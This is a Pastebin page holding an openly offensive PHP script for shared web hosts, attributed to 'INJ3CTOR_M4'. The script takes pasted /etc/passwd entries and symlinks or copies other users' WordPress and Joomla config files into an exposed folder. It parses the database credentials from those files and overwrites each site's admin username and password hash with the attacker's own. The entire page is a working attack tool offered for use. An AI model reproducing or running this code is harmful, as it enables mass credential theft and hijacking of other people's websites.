Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Made In Morocco</title>
- <style type=text/css>
- div#container{
- width:931px; position:relative; margin-top:0px; margin-left:auto; margin-right:auto; text-align:left;
- }body{
- text-align:center; margin:0; background-color:#000000; color:#000000;
- }input{
- border:dashed 1px; border-color:#333; BACKGROUND-COLOR:Black; font:8pt Verdana; color:Red;
- }input:hover{
- background:#1e1e1e; border:solid 0px #86CC50;
- }a {
- color:#518413; text-decoration:non;
- }a:hover{
- background:#1e1e1e; color:#f00; text-decoration:none;
- }textarea{
- width:500px; height:230px; border:1px #424242 dotted; background-color:#111111; color:#999999; font:9pt Verdana; font-family:Courier
- }
- </style>
- <br /><img src='http://im44.gulfup.com/Symxf.png'>
- <pre><big><font color='red'>Joomla & Wordpress Server Info Changer</font></big></pre>
- <?php
- #Joomla & Wordpress Server Info Changer
- #By INJ3CTOR_M4
- @error_reporting(0);
- @set_time_limit(0);
- if (function_exists ('symlink') or function_exists ('copy')){
- if (isset ($_POST['users'])){
- $r = "Options all \nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
- @mkdir('m4_configs', 0755);
- $f = @fopen ('m4_configs/.htaccess','w') or die("Unable to open file!");
- fwrite($f, $r);
- fclose($f);
- $passwd = explode("\n", $_POST['users']);
- foreach($passwd as $users){
- $users = explode(':', $users);
- $user = $users[0];
- $funs = array('symlink', 'copy');
- foreach($funs as $f){
- if (function_exists($f)) {
- @$f('/home/'.$user.'/public_html/wp-config.php',"m4_configs/$user-wp13.txt");
- @$f('/home/'.$user.'/public_html/wp/wp-config.php',"m4_configs/$user-wp13-wp.txt");
- @$f('/home/'.$user.'/public_html/WP/wp-config.php',"m4_configs/$user-wp13-WP.txt");
- @$f('/home/'.$user.'/public_html/wp/beta/wp-config.php',"m4_configs/$user-wp13-wp-beta.txt");
- @$f('/home/'.$user.'/public_html/beta/wp-config.php',"m4_configs/$user-wp13-beta.txt");
- @$f('/home/'.$user.'/public_html/press/wp-config.php',"m4_configs/$user-wp13-press.txt");
- @$f('/home/'.$user.'/public_html/wordpress/wp-config.php',"m4_configs/$user-wp13-wordpress.txt");
- @$f('/home/'.$user.'/public_html/Wordpress/wp-config.php',"m4_configs/$user-wp13-Wordpress.txt");
- @$f('/home/'.$user.'/public_html/blog/wp-config.php',"m4_configs/$user-wp13-Wordpress.txt");
- @$f('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',"m4_configs/$user-wp13-wordpress-beta.txt");
- @$f('/home/'.$user.'/public_html/news/wp-config.php',"m4_configs/$user-wp13-news.txt");
- @$f('/home/'.$user.'/public_html/new/wp-config.php',"m4_configs/$user-wp13-new.txt");
- @$f('/home/'.$user.'/public_html/blog/wp-config.php',"m4_configs/$user-wp-blog.txt");
- @$f('/home/'.$user.'/public_html/beta/wp-config.php',"m4_configs/$user-wp-beta.txt");
- @$f('/home/'.$user.'/public_html/blogs/wp-config.php',"m4_configs/$user-wp-blogs.txt");
- @$f('/home/'.$user.'/public_html/home/wp-config.php',"m4_configs/$user-wp-home.txt");
- @$f('/home/'.$user.'/public_html/protal/wp-config.php',"m4_configs/$user-wp-protal.txt");
- @$f('/home/'.$user.'/public_html/site/wp-config.php',"m4_configs/$user-wp-site.txt");
- @$f('/home/'.$user.'/public_html/main/wp-config.php',"m4_configs/$user-wp-main.txt");
- @$f('/home/'.$user.'/public_html/test/wp-config.php',"m4_configs/$user-wp-test.txt");
- @$f('/home/'.$user.'/public_html/joo/configuration.php',"m4_configs/$user-joo.txt");
- @$f('/home/'.$user.'/public_html/cms/configuration.php',"m4_configs/$user-joomla-cms.txt");
- @$f('/home/'.$user.'/public_html/site/configuration.php',"m4_configs/$user-joomla-site.txt");
- @$f('/home/'.$user.'/public_html/main/configuration.php',"m4_configs/$user-joomla-main.txt");
- @$f('/home/'.$user.'/public_html/news/configuration.php',"m4_configs/$user-joomla-news.txt");
- @$f('/home/'.$user.'/public_html/new/configuration.php',"m4_configs/$user-joomla-new.txt");
- @$f('/home/'.$user.'/public_html/home/configuration.php',"m4_configs/$user-joomla-home.txt");
- @$f('/home/'.$user.'/public_html/configuration.php',"m4_configs/$user-joomla.txt");
- break;
- }
- }
- }
- $url = get_configs_path();
- $data = Get_Source ($url,"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- preg_match_all('#href="(.*?)">#', $data, $matches);
- $configs = array_unique($matches[1]);
- foreach($configs as $config){
- $user = explode('-', $config);
- echo "<pre><font color=white> The Url : <a href='http://".gethostbyname($_SERVER["HTTP_HOST"])."/~".$user[0]."' target='_blank'>http://".gethostbyname($_SERVER["HTTP_HOST"])."/~".$user[0]."</a></font>";
- $data = Get_Source ($url.$config,"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3");
- if (preg_match ("#DB_USER#i", $data)){
- preg_match ("#'DB_HOST', '(.*?)'#i", $data, $DB_HOST);
- preg_match ("#'DB_USER', '(.*?)'#i", $data, $DB_USER);
- preg_match ("#'DB_PASSWORD', '(.*?)'#i", $data, $DB_PASSWORD);
- preg_match ("#'DB_NAME', '(.*?)'#i", $data, $DB_NAME);
- $con = @mysql_connect($DB_HOST[1],$DB_USER[1],$DB_PASSWORD[1]);
- if($con){
- $db_selected = @mysql_select_db($DB_NAME[1], $con);
- if($db_selected){
- $q = @mysql_query("UPDATE `wp_users` SET `user_login` ='inj3ctor_m4' WHERE ID = 1");
- $q = @mysql_query("UPDATE `wp_users` SET `user_pass` ='fd6b6fc9220b72d21683ae8e4f50a210' WHERE ID = 1");
- if($q){
- echo ' <font color=green>(New User: inj3ctor_m4, New Password: m4)</font></pre>';
- }else{
- echo ' <font color=red>(ERROR)</font></pre>';
- }
- }else{
- echo " <font color=red>(Can't Select The Database)</font></pre>";
- }
- }else{
- echo '<b> <font color=red>(Could not connect)</font></pre>';
- }
- }elseif (preg_match ("#class JConfig#i", $data)){
- preg_match ("#host = '(.*?)'#i", $data, $DB_HOST);
- preg_match ("#user = '(.*?)'#i", $data, $DB_USER);
- preg_match ("#password = '(.*?)'#i", $data, $DB_PASSWORD);
- preg_match ("#db = '(.*?)'#i", $data, $DB_NAME);
- $con = @mysql_connect($DB_HOST[1],$DB_USER[1],$DB_PASSWORD[1]);
- if($con){
- $db_selected = @mysql_select_db($DB_NAME[1], $con);
- if($db_selected){
- $q = @mysql_query("UPDATE `jos_users` SET `username` ='inj3ctor_m4' WHERE ID = 62");
- $q = @mysql_query("UPDATE `jos_users` SET `password` ='fd6b6fc9220b72d21683ae8e4f50a210' WHERE ID = 62");
- if($q){
- echo ' <font color=green>(New User: inj3ctor_m4, New Password: m4)</font></pre>';
- }else{
- echo ' <font color=red>(ERROR)</font></pre>';
- }
- }else{
- echo " <font color=red>(Can't Select The Database)</font></pre>";
- }
- }else{
- echo ' <font color=red>(Could not connect)</font></pre>';
- }
- }
- }
- }else{
- echo'<form method=POST />
- <textarea rows=30 cols=125 name=users placeholder="Put /etc/passwd Value Here"></textarea><br /><br />
- <input type=submit value=START />
- <br />';
- }
- }
- function get_configs_path(){
- $full_url_path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
- $parse = pathinfo ($full_url_path);
- $configs_path = $parse['dirname'].'/m4_configs/';
- return $configs_path;
- }
- function Get_Source ($url, $user_agent){
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_USERAGENT, $user_agent);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
- curl_setopt ($ch, CURLOPT_FRESH_CONNECT, 1);
- $source = curl_exec($ch);
- curl_close($ch);
- return $source;
- }
- ?>
- <br /><pre><font color=red>C0d3d 3y <a href=https://www.facebook.com/H4ck19 target=_blank>INJ3CTOR_M4</a></font></pre></p>
Advertisement
Add Comment
Please, Sign In to add comment